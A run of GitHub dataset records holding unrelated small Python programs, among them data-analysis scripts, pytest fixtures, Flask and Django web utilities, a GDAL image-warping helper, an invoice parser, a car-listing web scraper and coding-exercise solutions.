db.topics.find({})\n\nppsA = []\nppiA = []\nppA = []\n\nppsI = []\nppiI = []\n\nppsH = []\nppiH = []\n\nc = set()\n\nfor item in items:\n\ttId = item['_id']\n\ttopicName = item['topicName']\n\ttopicDescription = item['topicDescription']\n\tsemester = item['semester']\n\tclassification = item['classification']\n\ttotalPosts = item['TotalPosts']\n\tnumStudents = item['NumUniqueStudents']\n\tnumInstructors = item['NumUniqueInstructors']\n\tnumTas = item['NumUniqueTas']\n\tnumStudentPosts = item['NumStudentPosts']\n\tnumInstructorPosts = item['NumInstructorPosts']\n\tnumTaPosts = item['NumTaPosts']\n\tpostsPerStudent = item['postsPerStudent']\n\tpostsPerInstructor = item['postsPerInstructor']\n\n\tc.add(classification)\n\n\tif classification == 'Academic':\n\t\tppsA.append(postsPerStudent)\n\t\tppiA.append(postsPerInstructor)\n\t\tppA.append([tId, postsPerInstructor, postsPerStudent, numInstructors, numStudents])\n\n\tif classification == 'Introductions':\n\t\tppsI.append(postsPerStudent)\n\t\tppiI.append(postsPerInstructor)\n\n\tif classification == 'Help':\n\t\tppsH.append(postsPerStudent)\n\t\tppiH.append(postsPerInstructor)\n\ncorrelA = pearsonr(ppsA, ppiA)\ncorrelI = pearsonr(ppsI, ppiI)\ncorrelH = pearsonr(ppsH, ppiH)\n\nfor p in ppA:\n\tprint(str(p[0]) + \", \" + str(p[1]) + \", \" + str(p[2]) + \", \" + str(p[3]) + \", \" + str(p[4]))","repo_name":"jcastle0/LLED7910E-Asynchronous-Online-Discourse-Project","sub_path":"Data Analysis Scripts/discussions_topics_posts_per.py","file_name":"discussions_topics_posts_per.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25691630926","text":"from unittest.mock import mock_open, patch\n\nfrom pytest import fixture\n\nfrom music_insights.library.album import Album\nfrom music_insights.library.artist import Artist\nfrom music_insights.library.library import Library\nfrom music_insights.library.song import Song\n\n\n@fixture\ndef example_song1() -> Song:\n return Song(\n song_id=\"song_id1\",\n added_at=\"2023-01-26T23:47:21Z\",\n artists=[\"artist_id_1\", \"artist_id_2\"],\n duration_ms=185000,\n explicit=True,\n name=\"track_name\",\n popularity=40,\n track_number=2,\n album_id=\"album_id1\",\n disc_number=4,\n is_local=False\n )\n\n\n@fixture\ndef example_song2() -> Song:\n return Song(\n song_id=\"song_id2\",\n added_at=\"2023-01-26T23:47:21Z\",\n artists=[\"artist_id_1\", \"artist_id_2\"],\n duration_ms=185000,\n explicit=True,\n name=\"track_name\",\n popularity=40,\n track_number=2,\n album_id=\"album_id2\",\n disc_number=4,\n is_local=False\n )\n\n\n@fixture\ndef example_album1() -> Album:\n return Album(\n artists=[\"artist_id\"],\n album_id=\"album_id1\",\n name=\"album_name\",\n release_date=\"2030-01-01\",\n release_date_precision=\"day\",\n songs=[\"song_id1\"],\n total_tracks=2,\n genres=[\"genre1\", \"genre2\"],\n label=\"label1\",\n popularity=10\n )\n\n\n@fixture\ndef example_album2() -> Album:\n return Album(\n artists=[\"artist_id\"],\n album_id=\"album_id2\",\n name=\"album_name\",\n release_date=\"2050-01-01\",\n release_date_precision=\"day\",\n songs=[\"song_id2\"],\n total_tracks=2,\n genres=[\"genre1\", \"genre2\"],\n label=\"label1\",\n popularity=10\n )\n\n\n@fixture\ndef example_artist() -> Artist:\n return Artist(\n name=\"artist_name\",\n artist_id=\"artist_id\",\n followers=11,\n genres=[\"genre1\", \"genre2\"],\n popularity=21\n )\n\n\n@fixture\ndef example_library(\n example_song1: Song,\n example_song2: Song,\n example_album1: Album,\n example_album2: Album,\n example_artist: Artist\n) -> Library:\n return Library(\n {\n example_song1.song_id: example_song1,\n example_song2.song_id: example_song2\n },\n {\n example_album1.album_id: example_album1,\n example_album2.album_id: example_album2\n },\n {\n example_artist.artist_id: example_artist\n }\n )\n\n\nclass TestLibrary:\n def test_serialization(self, example_library: Library):\n mock = mock_open()\n with patch(\"music_insights.library.library.open\", mock, create=True):\n example_library.save_to_file()\n assert mock.call_count == 3\n\n def test_songs_by_decades(self, example_library: Library):\n songs_by_decades = example_library.get_songs_by_decades()\n assert songs_by_decades == {2030: [\"song_id1\"], 2050: [\"song_id2\"]}\n","repo_name":"JuanTecedor/MusicInsights","sub_path":"music_insights/test/library/test_library.py","file_name":"test_library.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23452964345","text":"def cout():\r\n i = 5\r\n while i > 0:\r\n yield i \r\n i -= 1\r\n\r\nfor i in cout():\r\n print(i)\r\n\r\n\r\n\r\ndef make_word():\r\n word = \"\"\r\n for ch in \"spam\":\r\n word +=ch\r\n yield word\r\n\r\nprint(list(make_word()))","repo_name":"cybity/Python","sub_path":"Intermediate/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"37814255718","text":"from pathlib import Path\nfrom osgeo import gdal, osr\n\n# Adapted from https://svn.osgeo.org/gdal/trunk/autotest/alg/warp.py\ndef warp_with_gcps(input_path, output_path, gcps, gcp_epsg=4326, output_epsg=4326):\n # Open the source dataset and add GCPs to it\n src_ds = input_path#gdal.OpenShared(str(input_path), gdal.GA_Update)\n gcp_srs = osr.SpatialReference()\n gcp_srs.ImportFromEPSG(gcp_epsg)\n gcp_crs_wkt = gcp_srs.ExportToWkt()\n src_ds.SetGCPs(gcps, gcp_crs_wkt)\n\n # Define target SRS\n dst_srs = osr.SpatialReference()\n dst_srs.ImportFromEPSG(output_epsg)\n dst_wkt = dst_srs.ExportToWkt()\n\n error_threshold = 0.125 # error threshold --> use same value as in gdalwarp\n resampling = gdal.GRA_Bilinear\n\n # Call AutoCreateWarpedVRT() to fetch default values for target raster dimensions and geotransform\n tmp_ds = gdal.AutoCreateWarpedVRT(src_ds,\n None, # src_wkt : left to default value --> will use the one from source\n dst_wkt,\n resampling,\n error_threshold,\n )\n dst_xsize = tmp_ds.RasterXSize\n dst_ysize = tmp_ds.RasterYSize\n dst_gt = tmp_ds.GetGeoTransform()\n tmp_ds = None\n\n # Now create the true target dataset\n dst_path = str(Path(output_path).with_suffix(\".tif\"))\n dst_ds = gdal.GetDriverByName('GTiff').Create(dst_path, dst_xsize, dst_ysize, src_ds.RasterCount)\n dst_ds.SetProjection(dst_wkt)\n dst_ds.SetGeoTransform(dst_gt)\n dst_ds.GetRasterBand(1).SetNoDataValue(0)\n\n # And run the reprojection\n gdal.ReprojectImage(src_ds,\n dst_ds,\n None, # src_wkt : left to default value --> will use the one from source\n None, # dst_wkt : left to default value --> will use the one from destination\n resampling,\n 0, # WarpMemoryLimit : left to default value\n error_threshold,\n None, # Progress callback : could be left to None or unspecified for silent progress\n None) # Progress callback user data\n dst_ds = None\n# input_path = Path(\"x.tif\")\n# output_path = Path(\"y.tif\")\n# # GCP input\n# xyz = [...]\n# row_col = [...]\n#\n# gcps = []\n# for (x, y, z), (row, col) in zip(xyz, row_col):\n# gcps.append(gdal.GCP(x, y, z, col, row))\n#\n# warp_with_gcps(input_path, output_path, gcps, gcp_epsg=3301, output_epsg=3301)\n","repo_name":"googleol/satelliteprocessing","sub_path":"Geometry/gdal_warp_georef.py","file_name":"gdal_warp_georef.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"8994746957","text":"from django.contrib.auth import authenticate, login\n\n\nclass TokenAuthMiddleware(object):\n \"\"\" Authentication Middleware for authenticating a user via token \"\"\"\n\n def process_request(self, request):\n \"\"\"\n Authenticate a user via token\n :param request: The HTTP request to pre-process\n :return:\n \"\"\"\n t = request.GET.get('token')\n if not t:\n return\n\n user = authenticate(token=t)\n if user:\n request.user = user\n # login(request, user)","repo_name":"mei-chen/beagle","sub_path":"Dogbone/authentication/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"41894116769","text":"def lambda_handler(event, context):\n \"\"\"\n Basic Lambda Handler\n Returns the message from the query string parameters\n\n \"\"\"\n print(event)\n try:\n name = str(event['queryStringParameters']['name'])\n amount = float(event['queryStringParameters']['amount'])\n percentage = float(event['queryStringParameters']['percentage'])\n answer = (amount * percentage) / 100\n return {\n 'statusCode':\n 200,\n 'body':\n \"Hello, \" + (name) + \" \" + str(percentage) + \" percent of \" +\n str(amount) + \" is \" + str(answer)\n }\n\n except KeyError:\n message = 'No message found'\n return {'statusCode': 200, 'body': message}","repo_name":"NDY-Hyde/Hyde-Terraform-Workshop","sub_path":"zara-lambda.py","file_name":"zara-lambda.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37871076590","text":"from flask import Flask\nfrom requests import Request, Session\nimport json\nimport urllib\nimport time\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n@app.route('/gofind-instagram-api/')\ndef instagram_api(access_token):\n s = Session()\n req = Request('GET', \"https://api.instagram.com/v1/users/self/?access_token=%s\"%access_token)\n prepped = req.prepare()\n resp = s.send(prepped)\n username = json.loads(resp.content)['data']['username']\n \n s = Session()\n req = Request('GET', \"https://api.instagram.com/v1/users/self/media/recent/?COUNT=250&access_token=%s\"%access_token)\n prepped = req.prepare()\n resp = s.send(prepped)\n\n data = json.loads(resp.content)\n img_list = \"input/\"+access_token+\".txt\"\n with open(img_list, 'w') as f:\n for i in xrange(len(data['data'])):\n url = data['data'][i]['images']['standard_resolution']['url']\n file_path = \"input/\"+access_token+\"_\"+str(i)+'.jpg'\n urllib.urlretrieve(url,file_path)\n f.write(file_path+'\\n')\n\n \n import yolo \n return_value = yolo.main(img_list, username)\n if return_value:\n return return_value\n else:\n return \"Fail\"\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"GeneDer/gofind.ai-instagram-image-search","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"15992964882","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash, jsonify, send_from_directory\nfrom contextlib import closing\nfrom datetime import datetime, timedelta\nimport sqlite3\nimport os\nfrom werkzeug.utils import secure_filename\nimport json\n\n# Custom\nfrom parse_json import parse_json\n\n# Create application instance\napp = Flask(__name__)\n\n# Load configuration\napp.config.from_pyfile('config.py')\n\n# Define\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in app.config[\n 'ALLOWED_EXTENSIONS']\n\n\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\n\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('schema.sql') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n\n@app.after_request\ndef after_request(response):\n g.db.close()\n return response\n\n# Placeholder: View function\n@app.route('/', methods=['GET', 'POST'])\ndef inputfile():\n cur = g.db.execute(\n 'select filename,desc,created,id from file_entries order by created desc')\n entries = [dict(filename=row[0], desc=row[1], created=row[\n 2], id=row[3]) for row in cur.fetchall()]\n\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(url_for('inputfile'))\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(url_for('inputfile'))\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n current = datetime.now()\n g.db.execute('insert into file_entries (filename,desc,created) values (?, ?, ?)',\n [file.filename, request.form['desc'], current])\n g.db.commit()\n message = \"File upload finished successfully.\"\n return redirect(url_for('inputfile', message=message))\n\n current = datetime.now().strftime('%Y/%m/%d %H:%M')\n message = request.args.get('message', '')\n if not message:\n message = \"Current time is \" + current\n return render_template('inputfile.html', message=message, entries=entries)\n\n\n@app.route('/output')\ndef output():\n fname = request.args.get('value').replace(' ','_')\n fpath = app.config['UPLOAD_FOLDER'] + fname\n jsonfile = open(fpath,'r')\n config = json.load(jsonfile)\n output = parse_json(config)\n\n return render_template('output.html', entries=output)\n\n\n@app.route('/delete', methods=['GET', 'POST'])\ndef delete():\n id = request.args.get('value')\n g.db.execute(\"delete from file_entries where id = ?\", [id])\n g.db.commit()\n return redirect(url_for('inputfile'))\n\n\n# Start application\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"KI1208/jsonparser","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32444041861","text":"import math\n\n\ndef solution(cap, n, deliveries, pickups):\n cap_deliveries = [0] * n # 배달하기 위해서 n개의 집을 몇 번 방문해야 하는가?\n cap_pickups = [0] * n # 픽업하기 위해서 n개의 집을 몇 번 방문해야 하는가?\n for i in range(len(deliveries) - 1, -1, -1): # 뒤에서부터 누적합\n if i == len(deliveries) - 1:\n deliveries[i] = deliveries[i]\n else:\n deliveries[i] = deliveries[i] + deliveries[i + 1]\n cap_deliveries[i] = math.ceil(deliveries[i] / cap) # cap을 고려한 n개 집의 배달 방문 횟수 배열\n\n for i in range(len(pickups) - 1, -1, -1):\n if i == len(pickups) - 1:\n pickups[i] = pickups[i]\n else:\n pickups[i] = pickups[i] + pickups[i + 1]\n cap_pickups[i] = math.ceil(pickups[i] / cap) # cap을 고려한 n개 집의 픽업 방문 횟수 배열\n\n temp = 0\n answer_deliveries = [] # 배달하기 위해 한번에 어디까지 가야하는가?\n answer_pickups = [] # 픽업하기 위해 한번에 어디까지 가야하는가?\n for i in range(n):\n if cap_deliveries[n - 1 - i] > temp: # temp보다 크다면 즉, 배달하기 위한 방문 횟수가 변한다면\n for _ in range(cap_deliveries[n - 1 - i] - temp): # 방문 해야하는 횟수대로\n answer_deliveries.append((n - i)) # 방문 거리를 append\n temp = cap_deliveries[n - 1 - i] # 그리고 temp를 업데이트\n temp = 0\n for i in range(n):\n if cap_pickups[n - 1 - i] > temp: # temp보다 크다면 즉, 픽업하기 위한 방문 횟수가 변한다면\n for _ in range(cap_pickups[n - 1 - i] - temp):\n answer_pickups.append((n - i))\n temp = cap_pickups[n - 1 - i]\n\n answer = 0\n # 픽업이 너무 많거나, 배달이 너무 많으면 둘의 방문 회차 수가 다르므로 0 배열로 맞춰 줌\n if len(answer_deliveries) > len(answer_pickups):\n answer_pickups.extend([0] * (len(answer_deliveries) - len(answer_pickups)))\n elif len(answer_deliveries) < len(answer_pickups):\n answer_deliveries.extend([0] * (len(answer_pickups) - len(answer_deliveries)))\n # 배달과 픽업 같은 회차에서 더 먼 곳까지 가면 나머지는 당연히 완료됨\n for i in range(len(answer_deliveries)):\n answer += 2 * max(answer_deliveries[i], answer_pickups[i])\n\n return answer\n\n\n# 뒤에서부터 누적합을 하면...\n# \"\"\"\n# 7 6 6 3 2 -> 4니까 7/4 = 1.x 2번은 가야됨... 4로 다 나눠보면? 1.x 1.x 1.x 0.x 0.x -> 올림 2 2 2 1 1\n# 7 7 4 4 0 -> 4인데 얘도 2번... 1.x 1.x 1 1 0 -> 올림 2 2 1 1 0\n\n# 일단 픽업이 딜리버리보다 큰 숫자가 없음. 즉 갔다가 오면서 다 해결됨\n# 2 2 2 1 1 -> 1차 5거리까지 / 2차 3거리까지\n# 2 2 1 1 0 -> 1차 5거리까지(위 따라감) / 2차 3거리까지 ... 16 끝\n\n# 5 3\n# 4 2\n\n# 6 5 5 3 3 2 2 ->\n# 5 5 3 3 2 2 0 ->\n\n# 2로 나눔 + 올림\n# 여기도 딜리버리보다 큰 픽업은 없음\n# 3 3 3 2 2 1 1 -> 1차 7까지 / 2차 5까지 / 3차 3까지\n# 3 3 2 2 1 1 0 -> 1차 7까지 / 2차 5까지 / 3차 3까지 ... 14 + 10 + 6 = 30\n\n# 7 5 3\n# 6 4 2\n\n# 만약 딜리버리보다 큰 픽업이 있다면? (그니까 한 집에 픽업할 게 개많음)\n# 1 0 3 1 2 -> 7 6 6 3 2 -> 2 2 2 1 1\n# 0 3 0 20 0 -> 23 23 20 20 0 -> 6 6 5 5 0\n\n# 5 3\n# 4 4 4 4 4 2\n\n# \"\"\"\n","repo_name":"boostcampDinosaur/coding-test-study","sub_path":"Wonjun/Week1/P_150369_택배_배달과_수거하기.py","file_name":"P_150369_택배_배달과_수거하기.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26165431217","text":"import slate3k as slate\nimport pandas as pd\nimport os\nfrom dateutil.parser import parse as dateparser\n\ndef get_money(line):\n \"\"\"\n returns the sum of all dollar values (printed in the format \"\"$x.xx\")\n in the given string\n \"\"\"\n sum = 0.0\n start = line.find('Time:')\n line = line[start:]\n dollar = line.find('$')\n while dollar != -1:\n line = line[dollar+1:]\n period_i = line.find('.')\n if len(line) > period_i + 3 and (line[period_i+3] == ',' or line[period_i+3] == '.'):\n sum += float(line[:period_i+3])\n dollar = line.find('$')\n\n return sum\n\n\ndef find_next_entry(invoice_text, month):\n \"\"\"\n find the next entry in the text based on previously seen text patterns\n \"\"\"\n i = invoice_text.find('On ' + month)\n return i\n\n\ninvoice_dir = \"invoices\"\nfiles = filter(lambda x : x[-4:]=='.pdf', os.listdir(invoice_dir))\ndf = pd.DataFrame(columns=['Date', 'Rental Company', 'Amount'])\ndfi = 0 # index to add to in df\n\nfor f in files:\n fname = os.path.join(invoice_dir, f)\n\n with open(fname,'rb') as invoice: # open invoice\n invoice_pdf = slate.PDF(invoice)\n invoice_text = str(invoice_pdf)\n invoice_text = invoice_text.replace('\\\\n', '\\n ') # clean up newlines\n invoice_text = invoice_text.replace('\\n \\n ', '\\n ')\n\n search_text = invoice_text\n\n \"\"\"\n fr = open('test.txt', 'w') # tracking what the program is seeing\n fr.write(invoice_text)\n fr.close()\n \"\"\"\n\n booking_index = invoice_text.find('bookings this month.')\n num_bookings = int(invoice_text[booking_index-4:booking_index].split(' ')[-2])\n\n data_start = invoice_text.find('usage details') # month of invoice is listed here\n month_str = invoice_text[:data_start].split(' ')[-3:-1]\n month = month_str[0]\n year = month_str[1]\n invoice_text = invoice_text[data_start:] # no ride data before this\n\n i = find_next_entry(invoice_text, month) # find the standard form of a Modo statement\n\n while i != -1:\n invoice_text = invoice_text[i:]\n month_pos = invoice_text.find(month)\n year_pos = invoice_text.find(year)\n time_pos = invoice_text[year_pos+4].find(':')\n date = dateparser(invoice_text[month_pos:year_pos+4] + ' ' +\n invoice_text[time_pos -2 : time_pos +3])\n date = date.date()\n\n split = invoice_text.find('PST') + 12\n if 'PVRT' in invoice_text[split: split + 65]:\n split = invoice_text[split: split + 65].find('PVRT') + 18\n readline = invoice_text[:split] # collect only the line that this statement is for\n invoice_text = invoice_text[split-3:] # remove the statement we've already found\n\n cost = get_money(readline)\n cost = \"%.2f\" % round(cost, 2)\n\n if \"$\" + cost not in search_text:\n print(cost + \" seems to be wrong in \" + f + \" on \" + str(date))\n if float(cost)<1.0:\n print(cost + \" seems to be wrong in \" + f + \" on \" + str(date))\n\n late_return_str = \"Charge for late return\"\n late_return_i = search_text.find(late_return_str)\n while late_return_i != -1:\n end_late_line = search_text[late_return_i:].find('\\n')\n print(\"Late return: \" + search_text[late_return_i: late_return_i + end_late_line] + \" in \" + f)\n search_text = search_text[late_return_i + len(late_return_str):]\n late_return_i = search_text.find(late_return_str)\n df.loc[dfi] = [date, 'Modo', cost]\n dfi += 1 # write to next row\n\n i = find_next_entry(invoice_text, month) # find the standard form of a Modo statement\n num_bookings -= 1\n\n if num_bookings != 0:\n print(str(num_bookings) + \" bookings off by in \" + f)\n\ndf.to_csv('modo_usage.csv', index=False)\n","repo_name":"JacksonDagger/modo-invoice-scraper","sub_path":"invoice2csv.py","file_name":"invoice2csv.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"834893061","text":"'''\nThis script is half-done, future features to add: \n1. Each parameter will be drawn using a function so that the structure is cleaner and \n the function can be more flexible \n2. All parameters should be saved in a .csv file\n3. Hard-coded titles (e.g., h2, a, span, etc.) should be drawn from an external record\n and try to use strings (i.e., \"h2\" instead of h2)\n4. Maybe make a checklist that records different scraping strategies for different \n websites \n'''\n\n# Get all the packages\nfrom bs4 import BeautifulSoup\nimport requests\nimport csv\nimport time\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n# Set the options so that this program will wait for the whole page to be loaded \n# However, this may mean only part of the Javascript have been executed \noptions = Options()\noptions.page_load_strategy = 'normal'\n\n# Open a browser \ndriver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n\n# Set initial page index and index increment (because the current program cannot \n# scrape the whole page fully loaded) so that all pages will be scraped and only\n# a certain amount of elements will be scraped each time \nbox_index = 0\nindex_increment = 2\n\n# Set home URL in case there are detail pages that need to be jumped to\n# Set the original URL that will be the beginning of scraping work \nURL_home = \"https://www.heritagetoyotaowingsmills.com\"\nURL_original = \"https://www.heritagetoyotaowingsmills.com/used-inventory/index.htm?start=\"\n\n# Go through each page and scrape elements \nwhile True: \n\n ## Go to a certain page/box and get the raw html document \n URL_specific = URL_original + str(box_index)\n driver.get(URL_specific)\n html_text = driver.page_source\n\n ## Process the raw file with BeautifulSoup() so as to make it easier to scrape\n soup = BeautifulSoup(html_text, \"lxml\")\n \n ## Get all the car-box on one page but only keep the first few that have the \n ## full information \n car_list = soup.find_all('div', class_ = 'vehicle-card-details-container')\n car_list = car_list[0:min(len(car_list), index_increment)]\n\n ## Go through each box/car on the list \n for car in car_list:\n\n ### Get the mileage information that's on a separate page \n try:\n detail_link = soup.find_all('a', class_ = 'more-details-link ml-auto text-link text-link-muted btn-small')[car_list.index(car)]['href']\n detail_link = URL_home + detail_link\n driver.get(detail_link)\n tmp_html_text = driver.page_source\n tmp_soup = BeautifulSoup(tmp_html_text, \"lxml\")\n\n #### different elements share the same feature as the mileage info, it's \n #### better to go through each of them and filter out the mileage one \n all_mileage = tmp_soup.find_all('span', class_ = 'mr-3')\n for i in range(0, len(all_mileage)):\n try: \n if i == len(all_mileage):\n mileage = \"N/A\"\n elif 'mile' in all_mileage[i].text:\n mileage = all_mileage[i].text\n break\n except: \n next\n driver.back()\n except:\n detail_link = \"N/A\"\n mileage = \"N/A\"\n\n ### Get the car name\n try:\n car_name = car.h2.a.text\n except: \n car_name = \"N/A\"\n\n ### Get the retail price and discount if available \n try:\n retail_price = car.find('dd', class_ = 'retailValue').span.text\n discount = car.find('dd', class_ = 'discount text-success').span.text\n except: \n retail_price = \"N/A\"\n discount = \"N/A\"\n\n ### Get the current final price \n try:\n final_price = car.find('span', class_ = 'text-right portal-price').text\n except:\n final_price = \"N/A\"\n\n ### For now, just print out the scraped info \n print(car_name)\n print(retail_price)\n print(discount)\n print(final_price)\n print(detail_link)\n print(mileage)\n \n ## If there's no more car elements, don't need to go into the next page \n if len(car_list) < index_increment:\n break\n else:\n box_index += index_increment\n\n# Close the browser \ndriver.quit()\n","repo_name":"KaiyueZou/Car-Dealer-Web-Scrape","sub_path":"main-script.py","file_name":"main-script.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17758543696","text":"# Runtime 121 ms Beats 10.96%\n# Memory 14.6 MB Beats 98.85%\n\nclass Solution:\n def searchInsert(self, nums: List[int], target: int) -> int:\n a = - 1\n for i in nums:\n if i < target:\n a += 1\n else:\n return a + 1\n return a + 1\n","repo_name":"MinyanLi/leetcode","sub_path":"0035_Search Insert Position/solution_1.py","file_name":"solution_1.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9358833082","text":"with open(\"27-9b.txt\", \"r\") as f:\n a = f.read().strip().split(\"\\n\")\n\nn = int(a[0])\ndata = [int(i) for i in a[1:]]\nansw = float(\"inf\")\n\nnch = [(data[i], i) for i in range(n) if data[i] % 2 != 0]\nnch.sort()\n\nprint(nch)\n","repo_name":"trofik00777/EgeInformatics","sub_path":"probn/20.06_1/27_1.py","file_name":"27_1.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"34391739220","text":"__author__ = \"Johannes Köster\"\n__copyright__ = \"Copyright 2019, Johannes Köster\"\n__email__ = \"johannes.koester@uni-due.de\"\n__license__ = \"MIT\"\n\nimport subprocess\nimport sys\nfrom snakemake.shell import shell\n\nspecies = snakemake.params.species.lower()\nrelease = int(snakemake.params.release)\nfmt = snakemake.params.fmt\nbuild = snakemake.params.build\nflavor = snakemake.params.get(\"flavor\", \"\")\n\nbranch = \"\"\nif release >= 81 and build == \"GRCh37\":\n # use the special grch37 branch for new releases\n branch = \"grch37/\"\n\nif flavor:\n flavor += \".\"\n\nlog = snakemake.log_fmt_shell(stdout=False, stderr=True)\n\nsuffix = \"\"\nif fmt == \"gtf\":\n suffix = \"gtf.gz\"\nelif fmt == \"gff3\":\n suffix = \"gff3.gz\"\n\nurl = \"ftp://ftp.ensembl.org/pub/{branch}release-{release}/{fmt}/{species}/{species_cap}.{build}.{release}.{flavor}{suffix}\".format(\n release=release,\n build=build,\n species=species,\n fmt=fmt,\n species_cap=species.capitalize(),\n suffix=suffix,\n flavor=flavor,\n branch=branch,\n)\n\ntry:\n shell(\"(curl -L {url} | gzip -d > {snakemake.output[0]}) {log}\")\nexcept subprocess.CalledProcessError as e:\n if snakemake.log:\n sys.stderr = open(snakemake.log[0], \"a\")\n print(\n \"Unable to download annotation data from Ensembl. \"\n \"Did you check that this combination of species, build, and release is actually provided?\",\n file=sys.stderr,\n )\n exit(1)\n","repo_name":"casperch/snakemake-wrappers","sub_path":"bio/reference/ensembl-annotation/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1834106918","text":"import flask\nfrom flask import request\nfrom flask import send_file\nfrom flask import after_this_request\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nimport json\nimport base64\nimport os\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = False\n\ndef set_chrome_options() -> None:\n \"\"\"Sets chrome options for Selenium.\n Chrome options for headless browser is enabled.\n \"\"\"\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n chrome_prefs = {}\n chrome_options.experimental_options[\"prefs\"] = chrome_prefs\n chrome_prefs[\"profile.default_content_settings\"] = {\"images\": 2}\n return chrome_options\n\ndef send_devtools(driver, cmd, params={}):\n resource = \"/session/%s/chromium/send_command_and_get_result\" % driver.session_id\n url = driver.command_executor._url + resource\n body = json.dumps({'cmd': cmd, 'params': params})\n response = driver.command_executor._request('POST', url, body)\n if response.get('status'):\n raise Exception(response.get('value'))\n return response.get('value')\n\n\ndef get_pdf_from_html(html_content, print_options={}):\n driver = webdriver.Chrome(options=set_chrome_options())\n\n driver.get(\"data:text/html;charset=utf-8,\" + html_content)\n\n calculated_print_options = {\n 'landscape': False,\n 'displayHeaderFooter': False,\n 'printBackground': True,\n 'preferCSSPageSize': True,\n }\n calculated_print_options.update(print_options)\n result = send_devtools(driver, \"Page.printToPDF\", calculated_print_options)\n driver.quit()\n\n return base64.b64decode(result['data'])\n\n\ndef html2pdf(html):\n result = get_pdf_from_html(html)\n return result\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"

        HTML 2 PDF Server

        use post request at /render to render your HTML into a pdf file. As Parameters you need to specify 'html' with the htnl string and 'filename' like invoice.pdf

        \"\n\n\n@app.route('/render', methods=['POST'])\ndef render():\n\n # get parameters from request\n html = request.form[\"html\"]\n filename = request.form[\"filename\"]\n\n # print html for debug\n print(html)\n\n # render html\n print(\"rendering \"+filename+\"...\")\n pdf = html2pdf(str(html))\n # store pdf file\n print(\"storing \"+filename+\"...\")\n with open(filename, 'wb') as file:\n file.write(pdf)\n\n # return stored file\n print(\"returning \"+filename+\"...\")\n\n @after_this_request\n def remove_file(response):\n print(\"removing sent file...\")\n try:\n os.remove(filename)\n except Exception as error:\n app.logger.error(\"Error removing or closing downloaded file handle\", error)\n return response\n return send_file(filename)\n\n\napp.run(host='0.0.0.0')\n","repo_name":"patrickbollmann/html2pdf-server","sub_path":"html2pdf-server.py","file_name":"html2pdf-server.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9039858257","text":"'''\nDescripttion: \nAuthor: coderwangson\nDate: 2020-09-13 21:56:38\nFilePath: \\leetcode\\24_两两交换链表中的节点\\两两交换链表中的节点.py\nLastEditTime: 2020-10-13 16:37:13\n'''\n\"\"\"\nCreated on 2019/3/5 21:04\n@File:两两交换链表中的节点.py\n@author: coderwangson\n\"\"\"\n\"#codeing=utf-8\"\n\n\n# Definition for 